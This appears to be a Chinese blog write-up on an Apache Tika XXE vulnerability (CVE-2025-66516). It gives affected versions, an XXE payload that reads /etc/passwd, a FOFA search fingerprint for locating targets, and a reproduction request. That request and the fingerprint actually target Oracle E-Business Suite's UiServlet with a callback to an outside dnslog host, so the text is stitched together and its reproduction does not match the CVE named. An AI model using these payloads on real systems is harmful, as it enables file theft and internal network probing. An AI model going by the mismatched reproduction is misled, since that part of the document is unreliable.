Apache Tika XXE注入漏洞(CVE-2025-66516)详解及复现

[TOC]

漏洞介绍

CVE编号：CVE-2025-66516

漏洞名称：Apache Tika XML外部实体注入漏洞（XXE）

CVSS 3.1评分：8.1（高危） / 部分来源评分为10.0（严重）

Apache Tika 是一个用于从各种文档格式（如 PDF、DOCX、PPT、图像等）中提取元数据和文本内容的开源 Java 工具包。其内部使用多种解析器，其中 PDF 解析依赖于 PDFBox 和对 XFA（XML Forms Architecture）表单的支持。

XFA 是 PDF 中嵌入的 XML 表单结构，用于动态表单逻辑。当 Tika 解析包含 XFA 的 PDF 时，会调用底层 XML 解析器处理这些 XML 数据。

攻击者可以通过在PDF文件中嵌入恶意的XFA(XML Forms Architecture)文件来触发XXE注入攻击。

该漏洞的核心问题在于Apache Tika在处理PDF文件中的XFA内容时，未能正确限制XML外部实体的解析，允许攻击者引用外部XML实体。攻击者可以利用此漏洞读取服务器上的敏感文件、探测内网结构、发起SSRF攻击，甚至在某些配置下执行任意代码。

影响范围

Apache Tika Core（org.apache.tika:tika-core）：1.13 ≤ 版本 ≤ 3.2.1
Apache Tika Parsers（org.apache.tika:tika-parsers）：< 2.0.0
Apache Tika PDF Parser Module（org.apache.tika:tika-parser-pdf-module）：2.0.0 ≤ 版本 ≤ 3.2.1

漏洞原因

在 tika-core <= 3.2.1 版本中，Tika 在解析 PDF 文件中的 XFA 内容时，未禁用 XML 外部实体（XXE）功能。具体表现为：

使用了默认配置的 DocumentBuilder 或 SAXParser，未设置 FEATURE_SECURE_PROCESSING 或显式禁用外部实体。
攻击者可在 PDF 的 XFA 部分嵌入恶意 XML，例如：

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

当 Tika 解析该 PDF 时，会触发 XXE，将 /etc/passwd 的内容加载并可能返回给攻击者（取决于应用如何处理提取结果）。

利用条件

攻击者可上传或诱导系统处理恶意PDF文件

FOFA指纹

title=”E-Business Suite”

漏洞复现

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 345

redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
<initialize>
  <param name="init_was_saved">test</param>
  <param name="return_url">http://c82d9062.log.dnslog.pp.ua.</param>
  <param name="ui_def_id">0</param>
  <param name="config_effective_usage_id">0</param>
  <param name="ui_type">Applet</param>
</initialize>